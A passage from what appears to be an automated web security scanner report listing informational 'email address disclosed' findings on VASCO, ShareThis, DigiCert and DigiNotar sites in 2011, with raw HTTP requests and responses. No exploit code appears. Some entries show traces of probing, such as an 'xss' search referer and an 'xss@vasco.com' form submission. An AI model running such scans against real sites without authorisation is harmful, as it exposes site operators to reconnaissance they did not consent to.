User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Date: Sat, 03 Sep 2011 17:31:56 GMT
Content-Length: 21176
Content-Type: application/x-javascript
Last-Modified: Mon, 08 Aug 2011 12:47:10 GMT
Accept-Ranges: bytes
ETag: "09bb049c955cc1:253d"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

// JavaScript Document
/*! Copyright (c) 2009 Brandon Aaron (http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.open
...[SNIP]...
<@emai:landofcoder@gmail.com>
...[SNIP]...

21.77. http://vasco.com/user_registration.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vasco.com
Path:	/user_registration.aspx

Issue detail

The following email address was disclosed in the response:

xss@vasco.com

Request

POST /user_registration.aspx HTTP/1.1
Host: vasco.com
Proxy-Connection: keep-alive
Referer: http://vasco.com/user_registration.aspx
Content-Length: 4223
Cache-Control: max-age=0
Origin: http://vasco.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=scg42x55p3xbinitbik3gp45; __utma=144557234.91160880.1315071157.1315071157.1315071157.1; __utmb=144557234.10.10.1315071157; __utmc=144557234; __utmz=144557234.1315071157.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIyMjcwOTQ5Mw9kFgJmD2QWAgIED2QWBgIBD2QWAgILD2QWAmYPD2QWAh4Jb25rZXlkb3duBboBamF2YXNjcmlwdDppZigoZXZlbnQud2hpY2ggJiYgZXZlbnQud2hpY2ggPT0gMTMpIHx8IC
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 03 Sep 2011 17:35:48 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 21965

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<strong>xss@vasco.com</strong>
...[SNIP]...

21.78. http://w.sharethis.com/button/buttons.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://w.sharethis.com
Path:	/button/buttons.js

Issue detail

The following email address was disclosed in the response:

support@sharethis.com

Request

GET /button/buttons.js?ver=3.2.1 HTTP/1.1
Host: w.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.hostnj.net/products-page/ssl-security/comodo-intranet-ssl-certificate/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
Expires: Sun, 04 Sep 2011 20:59:42 GMT
Cache-Control: max-age=86400
Content-Length: 58953
Date: Sat, 03 Sep 2011 21:33:13 GMT
Connection: close
Vary: Accept-Encoding

var cookie=new function(){return{setCookie:function(d,f,h){if(h){var c=new Date();c.setTime(c.getTime()+(h*24*60*60*1000));var a="; expires="+c.toGMTString()}else{var a=""}var b=d+"="+escape(f)+a;var
...[SNIP]...
rn false}stLight.processSTQ();stLight.readyRun=true;if(stLight.publisher==null){if(typeof(window.console)!=="undefined"){try{console.debug("Please specify a ShareThis Publisher Key \nFor help, contact support@sharethis.com")}catch(a){}}}var b=stLight.getSource();stLight.log("pview",b,"");stWidget.options.sessionID=stLight.sessionID;stWidget.options.fpc=stLight.fpc;stLight.loadServicesLoggedIn(function(){stButtons.onRead
...[SNIP]...

21.79. http://www.digicert.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.digicert.com
Path:	/

Issue detail

The following email address was disclosed in the response:

support@digicert.com

Request

GET / HTTP/1.1
Host: www.digicert.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 03 Sep 2011 21:29:34 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Last-Modified: Mon, 01 Aug 2011 20:46:03 GMT
P3P: CP="ALL DSP COR CUR DEV PSA CONi OUR BUS PHY ONL PUR COM STA", policyref="http://www.digicert.com/w3c/p3p.xml"
Vary: Accept-Encoding
Content-Length: 17301

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<area shape="rect" coords="664,42,844,69" href="mailto:support@digicert.com" />
...[SNIP]...

21.80. http://www.diginotar.com/Portals/0/Skins/DigiNotar_V7_COM/script/jqueryinnerfade.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.diginotar.com
Path:	/Portals/0/Skins/DigiNotar_V7_COM/script/jqueryinnerfade.js

Issue detail

The following email address was disclosed in the response:

t.baldes@medienfreunde.com

Request

GET /Portals/0/Skins/DigiNotar_V7_COM/script/jqueryinnerfade.js HTTP/1.1
Host: www.diginotar.com
Proxy-Connection: keep-alive
Referer: http://www.diginotar.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=XvkXVfGgzAEkAAAAN2UxY2I2MjUtNmI5ZS00Njc4LWFjODAtYWIyODg2MTVjZTU10; language=en-US

Response

HTTP/1.1 200 OK
Content-Length: 2636
Content-Type: application/x-javascript
Last-Modified: Mon, 31 Aug 2009 12:59:08 GMT
Accept-Ranges: bytes
ETag: "07699d33a2aca1:12fc"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 17:32:51 GMT

/* =========================================================

// jquery.innerfade.js

// Datum: 2007-01-29
// Firma: Medienfreunde Hofmann & Baldes GbR
// Autor: Torsten Baldes
// Mail: t.baldes@medienfreunde.com
// Web: http://medienfreunde.com

// based on the work of Matt Oakes http://portfolio.gizone.co.uk/applications/slideshow/

// ========================================================= */

(function(
...[SNIP]...

21.81. http://www.diginotar.com/Products/ExtendedValidationSSL/tabid/622/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.diginotar.com
Path:	/Products/ExtendedValidationSSL/tabid/622/Default.aspx

Issue detail

The following email address was disclosed in the response:

sales@diginotar.nl

Request

GET /Products/ExtendedValidationSSL/tabid/622/Default.aspx HTTP/1.1
Host: www.diginotar.com
Proxy-Connection: keep-alive
Referer: http://www.diginotar.com/SearchResults/tabid/37/Default.aspx?Search=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=XvkXVfGgzAEkAAAAN2UxY2I2MjUtNmI5ZS00Njc4LWFjODAtYWIyODg2MTVjZTU10; language=en-US; __utma=243368080.1326588329.1315071214.1315071214.1315071214.1; __utmb=243368080.4.10.1315071214; __utmc=243368080; __utmz=243368080.1315071214.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=DigiNotar

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 17:37:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 58966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<a href="mailto:sales@diginotar.nl" class="ApplyClass">
...[SNIP]...

21.82. http://www.diginotar.com/Products/Identity/CertiIDManagedPKI/tabid/2246/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.diginotar.com
Path:	/Products/Identity/CertiIDManagedPKI/tabid/2246/Default.aspx

Issue detail

The following email address was disclosed in the response:

sales@diginotar.nl

Request

GET /Products/Identity/CertiIDManagedPKI/tabid/2246/Default.aspx HTTP/1.1
Host: www.diginotar.com
Proxy-Connection: keep-alive
Referer: http://www.diginotar.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=XvkXVfGgzAEkAAAAN2UxY2I2MjUtNmI5ZS00Njc4LWFjODAtYWIyODg2MTVjZTU10; __utma=243368080.1326588329.1315071214.1315071214.1315071214.1; __utmb=243368080.1.10.1315071214; __utmc=243368080; __utmz=243368080.1315071214.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=DigiNotar; language=en-US

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 17:33:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 38651

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<a href="mailto:sales@diginotar.nl" class="ApplyClass">
...[SNIP]...

21.83. http://www.diginotar.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.diginotar.com
Path:	/Resources/Shared/scripts/DotNetNukeAjaxShared.js

Issue detail

The following email address was disclosed in the response:

nik.kalyani@dotnetnuke.com

Request

GET /Resources/Shared/scripts/DotNetNukeAjaxShared.js?_=1315071213930 HTTP/1.1
Host: www.diginotar.com
Proxy-Connection: keep-alive
Referer: http://www.diginotar.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=XvkXVfGgzAEkAAAAN2UxY2I2MjUtNmI5ZS00Njc4LWFjODAtYWIyODg2MTVjZTU10; language=en-US; __utma=243368080.1326588329.1315071214.1315071214.1315071214.1; __utmb=243368080.1.10.1315071214; __utmc=243368080; __utmz=243368080.1315071214.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=DigiNotar

Response

HTTP/1.1 200 OK
Content-Length: 10101
Content-Type: application/x-javascript
Last-Modified: Mon, 13 Jun 2011 05:54:20 GMT
Accept-Ranges: bytes
ETag: "08e7c568e29cc1:12fc"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 17:32:59 GMT

/*
DotNetNuke. - http://www.dotnetnuke.com
Copyright (c) 2002-2010
by DotNetNuke Corporation

Permission is hereby granted, free of charge, to any person obtaining a copy of this softwar
...[SNIP]...
<history>
   ''' Version 1.0.0: Feb. 28, 2007, Nik Kalyani, nik.kalyani@dotnetnuke.com
   ''' Version 1.0.1: Oct. 28, 2007, Nik Kalyani, nik.kalyani@dotnetnuke.com
   ''' </history>
...[SNIP]...

21.84. http://www.diginotar.com/Resources/Shared/scripts/widgets.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.diginotar.com
Path:	/Resources/Shared/scripts/widgets.js

Issue detail

The following email address was disclosed in the response:

nik.kalyani@dotnetnuke.com

Request

GET /Resources/Shared/scripts/widgets.js?_=1315071218018 HTTP/1.1
Host: www.diginotar.com
Proxy-Connection: keep-alive
Referer: http://www.diginotar.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=XvkXVfGgzAEkAAAAN2UxY2I2MjUtNmI5ZS00Njc4LWFjODAtYWIyODg2MTVjZTU10; language=en-US; __utma=243368080.1326588329.1315071214.1315071214.1315071214.1; __utmb=243368080.1.10.1315071214; __utmc=243368080; __utmz=243368080.1315071214.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=DigiNotar

Response

HTTP/1.1 200 OK
Content-Length: 11495
Content-Type: application/x-javascript
Last-Modified: Mon, 13 Jun 2011 05:54:20 GMT
Accept-Ranges: bytes
ETag: "08e7c568e29cc1:12fc"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 17:33:02 GMT

/*
DotNetNuke. - http://www.dotnetnuke.com
Copyright (c) 2002-2010
by DotNetNuke Corporation

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and as
...[SNIP]...
<history>
''' Version 1.0.0: Oct. 16, 2007, Nik Kalyani, nik.kalyani@dotnetnuke.com
''' </history>
...[SNIP]...

21.85. http://www.diginotar.com/controls/SolpartMenu/spmenu.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.diginotar.com
Path:	/controls/SolpartMenu/spmenu.js

Issue detail

The following email address was disclosed in the response:

jhenning@solpart.com

Request

GET /controls/SolpartMenu/spmenu.js HTTP/1.1
Host: www.diginotar.com
Proxy-Connection: keep-alive
Referer: http://www.diginotar.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=XvkXVfGgzAEkAAAAN2UxY2I2MjUtNmI5ZS00Njc4LWFjODAtYWIyODg2MTVjZTU10; language=en-US

Response

HTTP/1.1 200 OK
Content-Length: 67819
Content-Type: application/x-javascript
Last-Modified: Mon, 13 Jun 2011 05:53:52 GMT
Accept-Ranges: bytes
ETag: "018cc458e29cc1:12fc"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 17:32:49 GMT

//------------------------------------------------------//
// Solution Partner's ASP.NET Hierarchical Menu Control //
// Copyright (c) 2002-2005 //
// Jon Henning - Solution Partner's Inc //
// jhenning@solpart.com - http://www.solpart.com //
// Compatible Menu Version: <Min: 1400>
...[SNIP]...
tion spm_stopEventBubbling(e)
{
if (spm_browserType() == 'ie')
           window.event.cancelBubble = true;
       else
           e.stopPropagation();
}

//--- if you have a better solution send me an email - jhenning@solpart.com ---//
function spm_appendFunction(from_func, to_func)
{
if (from_func == null)
return new Function ( to_func );
return new Function ( spm_parseFunctionContents(from_func) + '\n' + spm_pa
...[SNIP]...

21.86. http://www.diginotar.com/portals/0/PrivacyStatement.pdf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.diginotar.com
Path:	/portals/0/PrivacyStatement.pdf

Issue detail

The following email addresses were disclosed in the response:

info@cbpweb.nl
servicedesk@diginotar.nl

Request

GET /portals/0/PrivacyStatement.pdf HTTP/1.1
Host: www.diginotar.com
Proxy-Connection: keep-alive
Referer: http://www.diginotar.com/Branchsolutions/tabid/857/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=XvkXVfGgzAEkAAAAN2UxY2I2MjUtNmI5ZS00Njc4LWFjODAtYWIyODg2MTVjZTU10; DNNSTUFF_Aggregator=4854=1; language=en-US; __utma=243368080.1326588329.1315071214.1315071214.1315071214.1; __utmb=243368080.7.10.1315071214; __utmc=243368080; __utmz=243368080.1315071214.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=DigiNotar

Response

HTTP/1.1 200 OK
Content-Length: 181986
Content-Type: application/pdf
Last-Modified: Wed, 22 Jun 2011 14:37:38 GMT
Accept-Ranges: bytes
ETag: "0e5deeee930cc1:12fc"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 17:38:26 GMT

%PDF-1.5
%....
1 0 obj
<</Type/Catalog/Pages 2 0 R/Lang(nl-NL) /StructTreeRoot 43 0 R/MarkInfo<</Marked true>>>>
endobj
2 0 obj
<</Type/Pages/Count 5/Kids[ 3 0 R 10 0 R 27 0 R 33 0 R 39 0 R] >>
...[SNIP]...
</Type/Action/S/URI/URI(mailto:info@cbpweb.nl) >
...[SNIP]...
</Type/Action/S/URI/URI(mailto:servicedesk@diginotar.nl) >
...[SNIP]...

21.87. https://www.diginotar.com/Portals/0/Skins/DigiNotar_V7_COM/script/jqueryinnerfade.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.diginotar.com
Path:	/Portals/0/Skins/DigiNotar_V7_COM/script/jqueryinnerfade.js

Issue detail

The following email address was disclosed in the response:

t.baldes@medienfreunde.com

Request

GET /Portals/0/Skins/DigiNotar_V7_COM/script/jqueryinnerfade.js HTTP/1.1
Host: www.diginotar.com
Connection: keep-alive
Referer: https://www.diginotar.com/Home/Contact/tabid/2506/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=XvkXVfGgzAEkAAAAN2UxY2I2MjUtNmI5ZS00Njc4LWFjODAtYWIyODg2MTVjZTU10; DNNSTUFF_Aggregator=4854=1; __utma=243368080.1326588329.1315071214.1315071214.1315071214.1; __utmb=243368080.6.10.1315071214; __utmc=243368080; __utmz=243368080.1315071214.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=DigiNotar; language=en-US

Response

HTTP/1.1 200 OK
Content-Length: 2636
Content-Type: application/x-javascript
Last-Modified: Mon, 31 Aug 2009 12:59:08 GMT
Accept-Ranges: bytes
ETag: "07699d33a2aca1:12fc"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 17:37:28 GMT

/* =========================================================

// jquery.innerfade.js

// Datum: 2007-01-29
// Firma: Medienfreunde Hofmann & Baldes GbR
// Autor: Torsten Baldes
// Mail: t.baldes@medienfreunde.com
// Web: http://medienfreunde.com

// based on the work of Matt Oakes http://portfolio.gizone.co.uk/applications/slideshow/

// ========================================================= */

(function(
...[SNIP]...

21.88. https://www.diginotar.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.diginotar.com
Path:	/Resources/Shared/scripts/DotNetNukeAjaxShared.js

Issue detail

The following email address was disclosed in the response:

nik.kalyani@dotnetnuke.com

Request

GET /Resources/Shared/scripts/DotNetNukeAjaxShared.js?_=1315071493994 HTTP/1.1
Host: www.diginotar.com
Connection: keep-alive
Referer: https://www.diginotar.com/Home/Contact/tabid/2506/Default.aspx
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=XvkXVfGgzAEkAAAAN2UxY2I2MjUtNmI5ZS00Njc4LWFjODAtYWIyODg2MTVjZTU10; DNNSTUFF_Aggregator=4854=1; __utma=243368080.1326588329.1315071214.1315071214.1315071214.1; __utmb=243368080.6.10.1315071214; __utmc=243368080; __utmz=243368080.1315071214.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=DigiNotar; language=en-US

Response

HTTP/1.1 200 OK
Content-Length: 10101
Content-Type: application/x-javascript
Last-Modified: Mon, 13 Jun 2011 05:54:20 GMT
Accept-Ranges: bytes
ETag: "08e7c568e29cc1:12fc"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 17:37:38 GMT

/*
DotNetNuke. - http://www.dotnetnuke.com
Copyright (c) 2002-2010
by DotNetNuke Corporation

Permission is hereby granted, free of charge, to any person obtaining a copy of this softwar
...[SNIP]...
<history>
   ''' Version 1.0.0: Feb. 28, 2007, Nik Kalyani, nik.kalyani@dotnetnuke.com
   ''' Version 1.0.1: Oct. 28, 2007, Nik Kalyani, nik.kalyani@dotnetnuke.com
   ''' </history>
...[SNIP]...

21.89. https://www.diginotar.com/Resources/Shared/scripts/widgets.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.diginotar.com
Path:	/Resources/Shared/scripts/widgets.js

Issue detail

The following email address was disclosed in the response:

nik.kalyani@dotnetnuke.com

Request

GET /Resources/Shared/scripts/widgets.js?_=1315071497127 HTTP/1.1
Host: www.diginotar.com
Connection: keep-alive
Referer: https://www.diginotar.com/Home/Contact/tabid/2506/Default.aspx
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=XvkXVfGgzAEkAAAAN2UxY2I2MjUtNmI5ZS00Njc4LWFjODAtYWIyODg2MTVjZTU10; DNNSTUFF_Aggregator=4854=1; __utma=243368080.1326588329.1315071214.1315071214.1315071214.1; __utmb=243368080.6.10.1315071214; __utmc=243368080; __utmz=243368080.1315071214.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=DigiNotar; language=en-US

Response

HTTP/1.1 200 OK
Content-Length: 11495
Content-Type: application/x-javascript
Last-Modified: Mon, 13 Jun 2011 05:54:20 GMT
Accept-Ranges: bytes
ETag: "08e7c568e29cc1:12fc"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 17:37:42 GMT

/*
DotNetNuke. - http://www.dotnetnuke.com
Copyright (c) 2002-2010
by DotNetNuke Corporation

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and as
...[SNIP]...
<history>
''' Version 1.0.0: Oct. 16, 2007, Nik Kalyani, nik.kalyani@dotnetnuke.com
''' </history>
...[SNIP]...

21.90. https://www.diginotar.com/controls/SolpartMenu/spmenu.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.diginotar.com
Path:	/controls/SolpartMenu/spmenu.js

Issue detail

The following email address was disclosed in the response:

jhenning@solpart.com

Request

GET /controls/SolpartMenu/spmenu.js HTTP/1.1
Host: www.diginotar.com
Connection: keep-alive
Referer: https://www.diginotar.com/Home/Contact/tabid/2506/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=XvkXVfGgzAEkAAAAN2UxY2I2MjUtNmI5ZS00Njc4LWFjODAtYWIyODg2MTVjZTU10; DNNSTUFF_Aggregator=4854=1; __utma=243368080.1326588329.1315071214.1315071214.1315071214.1; __utmb=243368080.6.10.1315071214; __utmc=243368080; __utmz=243368080.1315071214.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=DigiNotar; language=en-US

Response

HTTP/1.1 200 OK
Content-Length: 67819
Content-Type: application/x-javascript
Last-Modified: Mon, 13 Jun 2011 05:53:52 GMT
Accept-Ranges: bytes
ETag: "018cc458e29cc1:12fc"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 17:37:24 GMT

//------------------------------------------------------//
// Solution Partner's ASP.NET Hierarchical Menu Control //
// Copyright (c) 2002-2005 //
// Jon Henning - Solution Partner's Inc //
// jhenning@solpart.com - http://www.solpart.com //
// Compatible Menu Version: <Min: 1400>
...[SNIP]...
tion spm_stopEventBubbling(e)
{
if (spm_browserType() == 'ie')
           window.event.cancelBubble = true;
       else
           e.stopPropagation();
}

//--- if you have a better solution send me an email - jhenning@solpart.com ---//
function spm_appendFunction(from_func, to_func)
{
if (from_func == null)
return new Function ( to_func );
return new Function ( spm_parseFunctionContents(from_func) + '\n' + spm_pa
...[SNIP]...

21.91. http://www.diginotar.nl/Portals/7/Skins/Diginotar_v7_NL/script/jqueryinnerfade.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.diginotar.nl
Path:	/Portals/7/Skins/Diginotar_v7_NL/script/jqueryinnerfade.js

Issue detail

The following email address was disclosed in the response:

t.baldes@medienfreunde.com

Request

GET /Portals/7/Skins/Diginotar_v7_NL/script/jqueryinnerfade.js HTTP/1.1
Host: www.diginotar.nl
Proxy-Connection: keep-alive
Referer: http://www.diginotar.nl/Aanvragen/Lopendeprojecten/DienstenloketBerichtenbox/tabid/1448/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=73892103.1325282259.1315085212.1315085212.1315085212.1; __utmb=73892103.2.10.1315085212; __utmc=73892103; __utmz=73892103.1315085212.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); .ASPXANONYMOUS=nIw0DxKhzAEkAAAAMmQwMTQyZmEtYmQwNS00ZWNmLThiMGUtNTUwMDYwOTNiNDkw0; language=nl-NL

Response

HTTP/1.1 200 OK
Content-Length: 2636
Content-Type: application/x-javascript
Last-Modified: Mon, 31 Aug 2009 12:57:44 GMT
Accept-Ranges: bytes
ETag: "01488a13a2aca1:12fc"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:27:15 GMT

/* =========================================================

// jquery.innerfade.js

// Datum: 2007-01-29
// Firma: Medienfreunde Hofmann & Baldes GbR
// Autor: Torsten Baldes
// Mail: t.baldes@medienfreunde.com
// Web: http://medienfreunde.com

// based on the work of Matt Oakes http://portfolio.gizone.co.uk/applications/slideshow/

// ========================================================= */

(function(
...[SNIP]...

21.92. http://www.diginotar.nl/controls/SolpartMenu/spmenu.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.diginotar.nl
Path:	/controls/SolpartMenu/spmenu.js

Issue detail

